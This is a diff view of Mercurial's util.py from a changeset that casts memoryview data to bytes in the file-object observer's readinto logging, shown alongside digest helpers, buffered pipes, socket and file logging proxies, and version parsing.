##// END OF EJS Templates
util: cast memoryview to bytes...
Gregory Szorc -
r41429:b141b524 default
parent child Browse files
Show More
@@ -1,4015 +1,4021 b''
1 1 # util.py - Mercurial utility functions and platform specific implementations
2 2 #
3 3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
5 5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 6 #
7 7 # This software may be used and distributed according to the terms of the
8 8 # GNU General Public License version 2 or any later version.
9 9
10 10 """Mercurial utility functions and platform specific implementations.
11 11
12 12 This contains helper routines that are independent of the SCM core and
13 13 hide platform-specific details from the core.
14 14 """
15 15
16 16 from __future__ import absolute_import, print_function
17 17
18 18 import abc
19 19 import bz2
20 20 import collections
21 21 import contextlib
22 22 import errno
23 23 import gc
24 24 import hashlib
25 25 import itertools
26 26 import mmap
27 27 import os
28 28 import platform as pyplatform
29 29 import re as remod
30 30 import shutil
31 31 import socket
32 32 import stat
33 33 import sys
34 34 import time
35 35 import traceback
36 36 import warnings
37 37 import zlib
38 38
39 39 from .thirdparty import (
40 40 attr,
41 41 )
42 42 from hgdemandimport import tracing
43 43 from . import (
44 44 encoding,
45 45 error,
46 46 i18n,
47 47 node as nodemod,
48 48 policy,
49 49 pycompat,
50 50 urllibcompat,
51 51 )
52 52 from .utils import (
53 53 procutil,
54 54 stringutil,
55 55 )
56 56
57 57 base85 = policy.importmod(r'base85')
58 58 osutil = policy.importmod(r'osutil')
59 59 parsers = policy.importmod(r'parsers')
60 60
61 61 b85decode = base85.b85decode
62 62 b85encode = base85.b85encode
63 63
64 64 cookielib = pycompat.cookielib
65 65 httplib = pycompat.httplib
66 66 pickle = pycompat.pickle
67 67 safehasattr = pycompat.safehasattr
68 68 socketserver = pycompat.socketserver
69 69 bytesio = pycompat.bytesio
70 70 # TODO deprecate stringio name, as it is a lie on Python 3.
71 71 stringio = bytesio
72 72 xmlrpclib = pycompat.xmlrpclib
73 73
74 74 httpserver = urllibcompat.httpserver
75 75 urlerr = urllibcompat.urlerr
76 76 urlreq = urllibcompat.urlreq
77 77
78 78 # workaround for win32mbcs
79 79 _filenamebytestr = pycompat.bytestr
80 80
81 81 if pycompat.iswindows:
82 82 from . import windows as platform
83 83 else:
84 84 from . import posix as platform
85 85
86 86 _ = i18n._
87 87
88 88 bindunixsocket = platform.bindunixsocket
89 89 cachestat = platform.cachestat
90 90 checkexec = platform.checkexec
91 91 checklink = platform.checklink
92 92 copymode = platform.copymode
93 93 expandglobs = platform.expandglobs
94 94 getfsmountpoint = platform.getfsmountpoint
95 95 getfstype = platform.getfstype
96 96 groupmembers = platform.groupmembers
97 97 groupname = platform.groupname
98 98 isexec = platform.isexec
99 99 isowner = platform.isowner
100 100 listdir = osutil.listdir
101 101 localpath = platform.localpath
102 102 lookupreg = platform.lookupreg
103 103 makedir = platform.makedir
104 104 nlinks = platform.nlinks
105 105 normpath = platform.normpath
106 106 normcase = platform.normcase
107 107 normcasespec = platform.normcasespec
108 108 normcasefallback = platform.normcasefallback
109 109 openhardlinks = platform.openhardlinks
110 110 oslink = platform.oslink
111 111 parsepatchoutput = platform.parsepatchoutput
112 112 pconvert = platform.pconvert
113 113 poll = platform.poll
114 114 posixfile = platform.posixfile
115 115 readlink = platform.readlink
116 116 rename = platform.rename
117 117 removedirs = platform.removedirs
118 118 samedevice = platform.samedevice
119 119 samefile = platform.samefile
120 120 samestat = platform.samestat
121 121 setflags = platform.setflags
122 122 split = platform.split
123 123 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
124 124 statisexec = platform.statisexec
125 125 statislink = platform.statislink
126 126 umask = platform.umask
127 127 unlink = platform.unlink
128 128 username = platform.username
129 129
130 130 try:
131 131 recvfds = osutil.recvfds
132 132 except AttributeError:
133 133 pass
134 134
135 135 # Python compatibility
136 136
137 137 _notset = object()
138 138
139 139 def bitsfrom(container):
140 140 bits = 0
141 141 for bit in container:
142 142 bits |= bit
143 143 return bits
144 144
145 145 # python 2.6 still have deprecation warning enabled by default. We do not want
146 146 # to display anything to standard user so detect if we are running test and
147 147 # only use python deprecation warning in this case.
148 148 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
149 149 if _dowarn:
150 150 # explicitly unfilter our warning for python 2.7
151 151 #
152 152 # The option of setting PYTHONWARNINGS in the test runner was investigated.
153 153 # However, module name set through PYTHONWARNINGS was exactly matched, so
154 154 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
155 155 # makes the whole PYTHONWARNINGS thing useless for our usecase.
156 156 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
157 157 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
158 158 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
159 159 if _dowarn and pycompat.ispy3:
160 160 # silence warning emitted by passing user string to re.sub()
161 161 warnings.filterwarnings(r'ignore', r'bad escape', DeprecationWarning,
162 162 r'mercurial')
163 163 warnings.filterwarnings(r'ignore', r'invalid escape sequence',
164 164 DeprecationWarning, r'mercurial')
165 165 # TODO: reinvent imp.is_frozen()
166 166 warnings.filterwarnings(r'ignore', r'the imp module is deprecated',
167 167 DeprecationWarning, r'mercurial')
168 168
169 169 def nouideprecwarn(msg, version, stacklevel=1):
170 170 """Issue an python native deprecation warning
171 171
172 172 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
173 173 """
174 174 if _dowarn:
175 175 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
176 176 " update your code.)") % version
177 177 warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
178 178
179 179 DIGESTS = {
180 180 'md5': hashlib.md5,
181 181 'sha1': hashlib.sha1,
182 182 'sha512': hashlib.sha512,
183 183 }
184 184 # List of digest types from strongest to weakest
185 185 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
186 186
187 187 for k in DIGESTS_BY_STRENGTH:
188 188 assert k in DIGESTS
189 189
190 190 class digester(object):
191 191 """helper to compute digests.
192 192
193 193 This helper can be used to compute one or more digests given their name.
194 194
195 195 >>> d = digester([b'md5', b'sha1'])
196 196 >>> d.update(b'foo')
197 197 >>> [k for k in sorted(d)]
198 198 ['md5', 'sha1']
199 199 >>> d[b'md5']
200 200 'acbd18db4cc2f85cedef654fccc4a4d8'
201 201 >>> d[b'sha1']
202 202 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
203 203 >>> digester.preferred([b'md5', b'sha1'])
204 204 'sha1'
205 205 """
206 206
207 207 def __init__(self, digests, s=''):
208 208 self._hashes = {}
209 209 for k in digests:
210 210 if k not in DIGESTS:
211 211 raise error.Abort(_('unknown digest type: %s') % k)
212 212 self._hashes[k] = DIGESTS[k]()
213 213 if s:
214 214 self.update(s)
215 215
216 216 def update(self, data):
217 217 for h in self._hashes.values():
218 218 h.update(data)
219 219
220 220 def __getitem__(self, key):
221 221 if key not in DIGESTS:
222 222 raise error.Abort(_('unknown digest type: %s') % k)
223 223 return nodemod.hex(self._hashes[key].digest())
224 224
225 225 def __iter__(self):
226 226 return iter(self._hashes)
227 227
228 228 @staticmethod
229 229 def preferred(supported):
230 230 """returns the strongest digest type in both supported and DIGESTS."""
231 231
232 232 for k in DIGESTS_BY_STRENGTH:
233 233 if k in supported:
234 234 return k
235 235 return None
236 236
237 237 class digestchecker(object):
238 238 """file handle wrapper that additionally checks content against a given
239 239 size and digests.
240 240
241 241 d = digestchecker(fh, size, {'md5': '...'})
242 242
243 243 When multiple digests are given, all of them are validated.
244 244 """
245 245
246 246 def __init__(self, fh, size, digests):
247 247 self._fh = fh
248 248 self._size = size
249 249 self._got = 0
250 250 self._digests = dict(digests)
251 251 self._digester = digester(self._digests.keys())
252 252
253 253 def read(self, length=-1):
254 254 content = self._fh.read(length)
255 255 self._digester.update(content)
256 256 self._got += len(content)
257 257 return content
258 258
259 259 def validate(self):
260 260 if self._size != self._got:
261 261 raise error.Abort(_('size mismatch: expected %d, got %d') %
262 262 (self._size, self._got))
263 263 for k, v in self._digests.items():
264 264 if v != self._digester[k]:
265 265 # i18n: first parameter is a digest name
266 266 raise error.Abort(_('%s mismatch: expected %s, got %s') %
267 267 (k, v, self._digester[k]))
268 268
269 269 try:
270 270 buffer = buffer
271 271 except NameError:
272 272 def buffer(sliceable, offset=0, length=None):
273 273 if length is not None:
274 274 return memoryview(sliceable)[offset:offset + length]
275 275 return memoryview(sliceable)[offset:]
276 276
277 277 _chunksize = 4096
278 278
279 279 class bufferedinputpipe(object):
280 280 """a manually buffered input pipe
281 281
282 282 Python will not let us use buffered IO and lazy reading with 'polling' at
283 283 the same time. We cannot probe the buffer state and select will not detect
284 284 that data are ready to read if they are already buffered.
285 285
286 286 This class let us work around that by implementing its own buffering
287 287 (allowing efficient readline) while offering a way to know if the buffer is
288 288 empty from the output (allowing collaboration of the buffer with polling).
289 289
290 290 This class lives in the 'util' module because it makes use of the 'os'
291 291 module from the python stdlib.
292 292 """
293 293 def __new__(cls, fh):
294 294 # If we receive a fileobjectproxy, we need to use a variation of this
295 295 # class that notifies observers about activity.
296 296 if isinstance(fh, fileobjectproxy):
297 297 cls = observedbufferedinputpipe
298 298
299 299 return super(bufferedinputpipe, cls).__new__(cls)
300 300
301 301 def __init__(self, input):
302 302 self._input = input
303 303 self._buffer = []
304 304 self._eof = False
305 305 self._lenbuf = 0
306 306
307 307 @property
308 308 def hasbuffer(self):
309 309 """True is any data is currently buffered
310 310
311 311 This will be used externally a pre-step for polling IO. If there is
312 312 already data then no polling should be set in place."""
313 313 return bool(self._buffer)
314 314
315 315 @property
316 316 def closed(self):
317 317 return self._input.closed
318 318
319 319 def fileno(self):
320 320 return self._input.fileno()
321 321
322 322 def close(self):
323 323 return self._input.close()
324 324
325 325 def read(self, size):
326 326 while (not self._eof) and (self._lenbuf < size):
327 327 self._fillbuffer()
328 328 return self._frombuffer(size)
329 329
330 330 def unbufferedread(self, size):
331 331 if not self._eof and self._lenbuf == 0:
332 332 self._fillbuffer(max(size, _chunksize))
333 333 return self._frombuffer(min(self._lenbuf, size))
334 334
335 335 def readline(self, *args, **kwargs):
336 336 if len(self._buffer) > 1:
337 337 # this should not happen because both read and readline end with a
338 338 # _frombuffer call that collapse it.
339 339 self._buffer = [''.join(self._buffer)]
340 340 self._lenbuf = len(self._buffer[0])
341 341 lfi = -1
342 342 if self._buffer:
343 343 lfi = self._buffer[-1].find('\n')
344 344 while (not self._eof) and lfi < 0:
345 345 self._fillbuffer()
346 346 if self._buffer:
347 347 lfi = self._buffer[-1].find('\n')
348 348 size = lfi + 1
349 349 if lfi < 0: # end of file
350 350 size = self._lenbuf
351 351 elif len(self._buffer) > 1:
352 352 # we need to take previous chunks into account
353 353 size += self._lenbuf - len(self._buffer[-1])
354 354 return self._frombuffer(size)
355 355
356 356 def _frombuffer(self, size):
357 357 """return at most 'size' data from the buffer
358 358
359 359 The data are removed from the buffer."""
360 360 if size == 0 or not self._buffer:
361 361 return ''
362 362 buf = self._buffer[0]
363 363 if len(self._buffer) > 1:
364 364 buf = ''.join(self._buffer)
365 365
366 366 data = buf[:size]
367 367 buf = buf[len(data):]
368 368 if buf:
369 369 self._buffer = [buf]
370 370 self._lenbuf = len(buf)
371 371 else:
372 372 self._buffer = []
373 373 self._lenbuf = 0
374 374 return data
375 375
376 376 def _fillbuffer(self, size=_chunksize):
377 377 """read data to the buffer"""
378 378 data = os.read(self._input.fileno(), size)
379 379 if not data:
380 380 self._eof = True
381 381 else:
382 382 self._lenbuf += len(data)
383 383 self._buffer.append(data)
384 384
385 385 return data
386 386
387 387 def mmapread(fp):
388 388 try:
389 389 fd = getattr(fp, 'fileno', lambda: fp)()
390 390 return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
391 391 except ValueError:
392 392 # Empty files cannot be mmapped, but mmapread should still work. Check
393 393 # if the file is empty, and if so, return an empty buffer.
394 394 if os.fstat(fd).st_size == 0:
395 395 return ''
396 396 raise
397 397
398 398 class fileobjectproxy(object):
399 399 """A proxy around file objects that tells a watcher when events occur.
400 400
401 401 This type is intended to only be used for testing purposes. Think hard
402 402 before using it in important code.
403 403 """
404 404 __slots__ = (
405 405 r'_orig',
406 406 r'_observer',
407 407 )
408 408
409 409 def __init__(self, fh, observer):
410 410 object.__setattr__(self, r'_orig', fh)
411 411 object.__setattr__(self, r'_observer', observer)
412 412
413 413 def __getattribute__(self, name):
414 414 ours = {
415 415 r'_observer',
416 416
417 417 # IOBase
418 418 r'close',
419 419 # closed if a property
420 420 r'fileno',
421 421 r'flush',
422 422 r'isatty',
423 423 r'readable',
424 424 r'readline',
425 425 r'readlines',
426 426 r'seek',
427 427 r'seekable',
428 428 r'tell',
429 429 r'truncate',
430 430 r'writable',
431 431 r'writelines',
432 432 # RawIOBase
433 433 r'read',
434 434 r'readall',
435 435 r'readinto',
436 436 r'write',
437 437 # BufferedIOBase
438 438 # raw is a property
439 439 r'detach',
440 440 # read defined above
441 441 r'read1',
442 442 # readinto defined above
443 443 # write defined above
444 444 }
445 445
446 446 # We only observe some methods.
447 447 if name in ours:
448 448 return object.__getattribute__(self, name)
449 449
450 450 return getattr(object.__getattribute__(self, r'_orig'), name)
451 451
452 452 def __nonzero__(self):
453 453 return bool(object.__getattribute__(self, r'_orig'))
454 454
455 455 __bool__ = __nonzero__
456 456
457 457 def __delattr__(self, name):
458 458 return delattr(object.__getattribute__(self, r'_orig'), name)
459 459
460 460 def __setattr__(self, name, value):
461 461 return setattr(object.__getattribute__(self, r'_orig'), name, value)
462 462
463 463 def __iter__(self):
464 464 return object.__getattribute__(self, r'_orig').__iter__()
465 465
466 466 def _observedcall(self, name, *args, **kwargs):
467 467 # Call the original object.
468 468 orig = object.__getattribute__(self, r'_orig')
469 469 res = getattr(orig, name)(*args, **kwargs)
470 470
471 471 # Call a method on the observer of the same name with arguments
472 472 # so it can react, log, etc.
473 473 observer = object.__getattribute__(self, r'_observer')
474 474 fn = getattr(observer, name, None)
475 475 if fn:
476 476 fn(res, *args, **kwargs)
477 477
478 478 return res
479 479
480 480 def close(self, *args, **kwargs):
481 481 return object.__getattribute__(self, r'_observedcall')(
482 482 r'close', *args, **kwargs)
483 483
484 484 def fileno(self, *args, **kwargs):
485 485 return object.__getattribute__(self, r'_observedcall')(
486 486 r'fileno', *args, **kwargs)
487 487
488 488 def flush(self, *args, **kwargs):
489 489 return object.__getattribute__(self, r'_observedcall')(
490 490 r'flush', *args, **kwargs)
491 491
492 492 def isatty(self, *args, **kwargs):
493 493 return object.__getattribute__(self, r'_observedcall')(
494 494 r'isatty', *args, **kwargs)
495 495
496 496 def readable(self, *args, **kwargs):
497 497 return object.__getattribute__(self, r'_observedcall')(
498 498 r'readable', *args, **kwargs)
499 499
500 500 def readline(self, *args, **kwargs):
501 501 return object.__getattribute__(self, r'_observedcall')(
502 502 r'readline', *args, **kwargs)
503 503
504 504 def readlines(self, *args, **kwargs):
505 505 return object.__getattribute__(self, r'_observedcall')(
506 506 r'readlines', *args, **kwargs)
507 507
508 508 def seek(self, *args, **kwargs):
509 509 return object.__getattribute__(self, r'_observedcall')(
510 510 r'seek', *args, **kwargs)
511 511
512 512 def seekable(self, *args, **kwargs):
513 513 return object.__getattribute__(self, r'_observedcall')(
514 514 r'seekable', *args, **kwargs)
515 515
516 516 def tell(self, *args, **kwargs):
517 517 return object.__getattribute__(self, r'_observedcall')(
518 518 r'tell', *args, **kwargs)
519 519
520 520 def truncate(self, *args, **kwargs):
521 521 return object.__getattribute__(self, r'_observedcall')(
522 522 r'truncate', *args, **kwargs)
523 523
524 524 def writable(self, *args, **kwargs):
525 525 return object.__getattribute__(self, r'_observedcall')(
526 526 r'writable', *args, **kwargs)
527 527
528 528 def writelines(self, *args, **kwargs):
529 529 return object.__getattribute__(self, r'_observedcall')(
530 530 r'writelines', *args, **kwargs)
531 531
532 532 def read(self, *args, **kwargs):
533 533 return object.__getattribute__(self, r'_observedcall')(
534 534 r'read', *args, **kwargs)
535 535
536 536 def readall(self, *args, **kwargs):
537 537 return object.__getattribute__(self, r'_observedcall')(
538 538 r'readall', *args, **kwargs)
539 539
540 540 def readinto(self, *args, **kwargs):
541 541 return object.__getattribute__(self, r'_observedcall')(
542 542 r'readinto', *args, **kwargs)
543 543
544 544 def write(self, *args, **kwargs):
545 545 return object.__getattribute__(self, r'_observedcall')(
546 546 r'write', *args, **kwargs)
547 547
548 548 def detach(self, *args, **kwargs):
549 549 return object.__getattribute__(self, r'_observedcall')(
550 550 r'detach', *args, **kwargs)
551 551
552 552 def read1(self, *args, **kwargs):
553 553 return object.__getattribute__(self, r'_observedcall')(
554 554 r'read1', *args, **kwargs)
555 555
556 556 class observedbufferedinputpipe(bufferedinputpipe):
557 557 """A variation of bufferedinputpipe that is aware of fileobjectproxy.
558 558
559 559 ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
560 560 bypass ``fileobjectproxy``. Because of this, we need to make
561 561 ``bufferedinputpipe`` aware of these operations.
562 562
563 563 This variation of ``bufferedinputpipe`` can notify observers about
564 564 ``os.read()`` events. It also re-publishes other events, such as
565 565 ``read()`` and ``readline()``.
566 566 """
567 567 def _fillbuffer(self):
568 568 res = super(observedbufferedinputpipe, self)._fillbuffer()
569 569
570 570 fn = getattr(self._input._observer, r'osread', None)
571 571 if fn:
572 572 fn(res, _chunksize)
573 573
574 574 return res
575 575
576 576 # We use different observer methods because the operation isn't
577 577 # performed on the actual file object but on us.
578 578 def read(self, size):
579 579 res = super(observedbufferedinputpipe, self).read(size)
580 580
581 581 fn = getattr(self._input._observer, r'bufferedread', None)
582 582 if fn:
583 583 fn(res, size)
584 584
585 585 return res
586 586
587 587 def readline(self, *args, **kwargs):
588 588 res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)
589 589
590 590 fn = getattr(self._input._observer, r'bufferedreadline', None)
591 591 if fn:
592 592 fn(res)
593 593
594 594 return res
595 595
596 596 PROXIED_SOCKET_METHODS = {
597 597 r'makefile',
598 598 r'recv',
599 599 r'recvfrom',
600 600 r'recvfrom_into',
601 601 r'recv_into',
602 602 r'send',
603 603 r'sendall',
604 604 r'sendto',
605 605 r'setblocking',
606 606 r'settimeout',
607 607 r'gettimeout',
608 608 r'setsockopt',
609 609 }
610 610
611 611 class socketproxy(object):
612 612 """A proxy around a socket that tells a watcher when events occur.
613 613
614 614 This is like ``fileobjectproxy`` except for sockets.
615 615
616 616 This type is intended to only be used for testing purposes. Think hard
617 617 before using it in important code.
618 618 """
619 619 __slots__ = (
620 620 r'_orig',
621 621 r'_observer',
622 622 )
623 623
624 624 def __init__(self, sock, observer):
625 625 object.__setattr__(self, r'_orig', sock)
626 626 object.__setattr__(self, r'_observer', observer)
627 627
628 628 def __getattribute__(self, name):
629 629 if name in PROXIED_SOCKET_METHODS:
630 630 return object.__getattribute__(self, name)
631 631
632 632 return getattr(object.__getattribute__(self, r'_orig'), name)
633 633
634 634 def __delattr__(self, name):
635 635 return delattr(object.__getattribute__(self, r'_orig'), name)
636 636
637 637 def __setattr__(self, name, value):
638 638 return setattr(object.__getattribute__(self, r'_orig'), name, value)
639 639
640 640 def __nonzero__(self):
641 641 return bool(object.__getattribute__(self, r'_orig'))
642 642
643 643 __bool__ = __nonzero__
644 644
645 645 def _observedcall(self, name, *args, **kwargs):
646 646 # Call the original object.
647 647 orig = object.__getattribute__(self, r'_orig')
648 648 res = getattr(orig, name)(*args, **kwargs)
649 649
650 650 # Call a method on the observer of the same name with arguments
651 651 # so it can react, log, etc.
652 652 observer = object.__getattribute__(self, r'_observer')
653 653 fn = getattr(observer, name, None)
654 654 if fn:
655 655 fn(res, *args, **kwargs)
656 656
657 657 return res
658 658
659 659 def makefile(self, *args, **kwargs):
660 660 res = object.__getattribute__(self, r'_observedcall')(
661 661 r'makefile', *args, **kwargs)
662 662
663 663 # The file object may be used for I/O. So we turn it into a
664 664 # proxy using our observer.
665 665 observer = object.__getattribute__(self, r'_observer')
666 666 return makeloggingfileobject(observer.fh, res, observer.name,
667 667 reads=observer.reads,
668 668 writes=observer.writes,
669 669 logdata=observer.logdata,
670 670 logdataapis=observer.logdataapis)
671 671
672 672 def recv(self, *args, **kwargs):
673 673 return object.__getattribute__(self, r'_observedcall')(
674 674 r'recv', *args, **kwargs)
675 675
676 676 def recvfrom(self, *args, **kwargs):
677 677 return object.__getattribute__(self, r'_observedcall')(
678 678 r'recvfrom', *args, **kwargs)
679 679
680 680 def recvfrom_into(self, *args, **kwargs):
681 681 return object.__getattribute__(self, r'_observedcall')(
682 682 r'recvfrom_into', *args, **kwargs)
683 683
684 684 def recv_into(self, *args, **kwargs):
685 685 return object.__getattribute__(self, r'_observedcall')(
686 686 r'recv_info', *args, **kwargs)
687 687
688 688 def send(self, *args, **kwargs):
689 689 return object.__getattribute__(self, r'_observedcall')(
690 690 r'send', *args, **kwargs)
691 691
692 692 def sendall(self, *args, **kwargs):
693 693 return object.__getattribute__(self, r'_observedcall')(
694 694 r'sendall', *args, **kwargs)
695 695
696 696 def sendto(self, *args, **kwargs):
697 697 return object.__getattribute__(self, r'_observedcall')(
698 698 r'sendto', *args, **kwargs)
699 699
700 700 def setblocking(self, *args, **kwargs):
701 701 return object.__getattribute__(self, r'_observedcall')(
702 702 r'setblocking', *args, **kwargs)
703 703
704 704 def settimeout(self, *args, **kwargs):
705 705 return object.__getattribute__(self, r'_observedcall')(
706 706 r'settimeout', *args, **kwargs)
707 707
708 708 def gettimeout(self, *args, **kwargs):
709 709 return object.__getattribute__(self, r'_observedcall')(
710 710 r'gettimeout', *args, **kwargs)
711 711
712 712 def setsockopt(self, *args, **kwargs):
713 713 return object.__getattribute__(self, r'_observedcall')(
714 714 r'setsockopt', *args, **kwargs)
715 715
716 716 class baseproxyobserver(object):
717 717 def _writedata(self, data):
718 718 if not self.logdata:
719 719 if self.logdataapis:
720 720 self.fh.write('\n')
721 721 self.fh.flush()
722 722 return
723 723
724 724 # Simple case writes all data on a single line.
725 725 if b'\n' not in data:
726 726 if self.logdataapis:
727 727 self.fh.write(': %s\n' % stringutil.escapestr(data))
728 728 else:
729 729 self.fh.write('%s> %s\n'
730 730 % (self.name, stringutil.escapestr(data)))
731 731 self.fh.flush()
732 732 return
733 733
734 734 # Data with newlines is written to multiple lines.
735 735 if self.logdataapis:
736 736 self.fh.write(':\n')
737 737
738 738 lines = data.splitlines(True)
739 739 for line in lines:
740 740 self.fh.write('%s> %s\n'
741 741 % (self.name, stringutil.escapestr(line)))
742 742 self.fh.flush()
743 743
744 744 class fileobjectobserver(baseproxyobserver):
745 745 """Logs file object activity."""
746 746 def __init__(self, fh, name, reads=True, writes=True, logdata=False,
747 747 logdataapis=True):
748 748 self.fh = fh
749 749 self.name = name
750 750 self.logdata = logdata
751 751 self.logdataapis = logdataapis
752 752 self.reads = reads
753 753 self.writes = writes
754 754
755 755 def read(self, res, size=-1):
756 756 if not self.reads:
757 757 return
758 758 # Python 3 can return None from reads at EOF instead of empty strings.
759 759 if res is None:
760 760 res = ''
761 761
762 762 if size == -1 and res == '':
763 763 # Suppress pointless read(-1) calls that return
764 764 # nothing. These happen _a lot_ on Python 3, and there
765 765 # doesn't seem to be a better workaround to have matching
766 766 # Python 2 and 3 behavior. :(
767 767 return
768 768
769 769 if self.logdataapis:
770 770 self.fh.write('%s> read(%d) -> %d' % (self.name, size, len(res)))
771 771
772 772 self._writedata(res)
773 773
774 774 def readline(self, res, limit=-1):
775 775 if not self.reads:
776 776 return
777 777
778 778 if self.logdataapis:
779 779 self.fh.write('%s> readline() -> %d' % (self.name, len(res)))
780 780
781 781 self._writedata(res)
782 782
783 783 def readinto(self, res, dest):
784 784 if not self.reads:
785 785 return
786 786
787 787 if self.logdataapis:
788 788 self.fh.write('%s> readinto(%d) -> %r' % (self.name, len(dest),
789 789 res))
790 790
791 791 data = dest[0:res] if res is not None else b''
792
793 # _writedata() uses "in" operator and is confused by memoryview because
794 # characters are ints on Python 3.
795 if isinstance(data, memoryview):
796 data = data.tobytes()
797
792 798 self._writedata(data)
793 799
794 800 def write(self, res, data):
795 801 if not self.writes:
796 802 return
797 803
798 804 # Python 2 returns None from some write() calls. Python 3 (reasonably)
799 805 # returns the integer bytes written.
800 806 if res is None and data:
801 807 res = len(data)
802 808
803 809 if self.logdataapis:
804 810 self.fh.write('%s> write(%d) -> %r' % (self.name, len(data), res))
805 811
806 812 self._writedata(data)
807 813
808 814 def flush(self, res):
809 815 if not self.writes:
810 816 return
811 817
812 818 self.fh.write('%s> flush() -> %r\n' % (self.name, res))
813 819
814 820 # For observedbufferedinputpipe.
815 821 def bufferedread(self, res, size):
816 822 if not self.reads:
817 823 return
818 824
819 825 if self.logdataapis:
820 826 self.fh.write('%s> bufferedread(%d) -> %d' % (
821 827 self.name, size, len(res)))
822 828
823 829 self._writedata(res)
824 830
825 831 def bufferedreadline(self, res):
826 832 if not self.reads:
827 833 return
828 834
829 835 if self.logdataapis:
830 836 self.fh.write('%s> bufferedreadline() -> %d' % (
831 837 self.name, len(res)))
832 838
833 839 self._writedata(res)
834 840
835 841 def makeloggingfileobject(logh, fh, name, reads=True, writes=True,
836 842 logdata=False, logdataapis=True):
837 843 """Turn a file object into a logging file object."""
838 844
839 845 observer = fileobjectobserver(logh, name, reads=reads, writes=writes,
840 846 logdata=logdata, logdataapis=logdataapis)
841 847 return fileobjectproxy(fh, observer)
842 848
843 849 class socketobserver(baseproxyobserver):
844 850 """Logs socket activity."""
845 851 def __init__(self, fh, name, reads=True, writes=True, states=True,
846 852 logdata=False, logdataapis=True):
847 853 self.fh = fh
848 854 self.name = name
849 855 self.reads = reads
850 856 self.writes = writes
851 857 self.states = states
852 858 self.logdata = logdata
853 859 self.logdataapis = logdataapis
854 860
855 861 def makefile(self, res, mode=None, bufsize=None):
856 862 if not self.states:
857 863 return
858 864
859 865 self.fh.write('%s> makefile(%r, %r)\n' % (
860 866 self.name, mode, bufsize))
861 867
862 868 def recv(self, res, size, flags=0):
863 869 if not self.reads:
864 870 return
865 871
866 872 if self.logdataapis:
867 873 self.fh.write('%s> recv(%d, %d) -> %d' % (
868 874 self.name, size, flags, len(res)))
869 875 self._writedata(res)
870 876
871 877 def recvfrom(self, res, size, flags=0):
872 878 if not self.reads:
873 879 return
874 880
875 881 if self.logdataapis:
876 882 self.fh.write('%s> recvfrom(%d, %d) -> %d' % (
877 883 self.name, size, flags, len(res[0])))
878 884
879 885 self._writedata(res[0])
880 886
881 887 def recvfrom_into(self, res, buf, size, flags=0):
882 888 if not self.reads:
883 889 return
884 890
885 891 if self.logdataapis:
886 892 self.fh.write('%s> recvfrom_into(%d, %d) -> %d' % (
887 893 self.name, size, flags, res[0]))
888 894
889 895 self._writedata(buf[0:res[0]])
890 896
891 897 def recv_into(self, res, buf, size=0, flags=0):
892 898 if not self.reads:
893 899 return
894 900
895 901 if self.logdataapis:
896 902 self.fh.write('%s> recv_into(%d, %d) -> %d' % (
897 903 self.name, size, flags, res))
898 904
899 905 self._writedata(buf[0:res])
900 906
901 907 def send(self, res, data, flags=0):
902 908 if not self.writes:
903 909 return
904 910
905 911 self.fh.write('%s> send(%d, %d) -> %d' % (
906 912 self.name, len(data), flags, len(res)))
907 913 self._writedata(data)
908 914
909 915 def sendall(self, res, data, flags=0):
910 916 if not self.writes:
911 917 return
912 918
913 919 if self.logdataapis:
914 920 # Returns None on success. So don't bother reporting return value.
915 921 self.fh.write('%s> sendall(%d, %d)' % (
916 922 self.name, len(data), flags))
917 923
918 924 self._writedata(data)
919 925
920 926 def sendto(self, res, data, flagsoraddress, address=None):
921 927 if not self.writes:
922 928 return
923 929
924 930 if address:
925 931 flags = flagsoraddress
926 932 else:
927 933 flags = 0
928 934
929 935 if self.logdataapis:
930 936 self.fh.write('%s> sendto(%d, %d, %r) -> %d' % (
931 937 self.name, len(data), flags, address, res))
932 938
933 939 self._writedata(data)
934 940
935 941 def setblocking(self, res, flag):
936 942 if not self.states:
937 943 return
938 944
939 945 self.fh.write('%s> setblocking(%r)\n' % (self.name, flag))
940 946
941 947 def settimeout(self, res, value):
942 948 if not self.states:
943 949 return
944 950
945 951 self.fh.write('%s> settimeout(%r)\n' % (self.name, value))
946 952
947 953 def gettimeout(self, res):
948 954 if not self.states:
949 955 return
950 956
951 957 self.fh.write('%s> gettimeout() -> %f\n' % (self.name, res))
952 958
953 959 def setsockopt(self, res, level, optname, value):
954 960 if not self.states:
955 961 return
956 962
957 963 self.fh.write('%s> setsockopt(%r, %r, %r) -> %r\n' % (
958 964 self.name, level, optname, value, res))
959 965
960 966 def makeloggingsocket(logh, fh, name, reads=True, writes=True, states=True,
961 967 logdata=False, logdataapis=True):
962 968 """Turn a socket into a logging socket."""
963 969
964 970 observer = socketobserver(logh, name, reads=reads, writes=writes,
965 971 states=states, logdata=logdata,
966 972 logdataapis=logdataapis)
967 973 return socketproxy(fh, observer)
968 974
969 975 def version():
970 976 """Return version information if available."""
971 977 try:
972 978 from . import __version__
973 979 return __version__.version
974 980 except ImportError:
975 981 return 'unknown'
976 982
977 983 def versiontuple(v=None, n=4):
978 984 """Parses a Mercurial version string into an N-tuple.
979 985
980 986 The version string to be parsed is specified with the ``v`` argument.
981 987 If it isn't defined, the current Mercurial version string will be parsed.
982 988
983 989 ``n`` can be 2, 3, or 4. Here is how some version strings map to
984 990 returned values:
985 991
986 992 >>> v = b'3.6.1+190-df9b73d2d444'
987 993 >>> versiontuple(v, 2)
988 994 (3, 6)
989 995 >>> versiontuple(v, 3)
990 996 (3, 6, 1)
991 997 >>> versiontuple(v, 4)
992 998 (3, 6, 1, '190-df9b73d2d444')
993 999
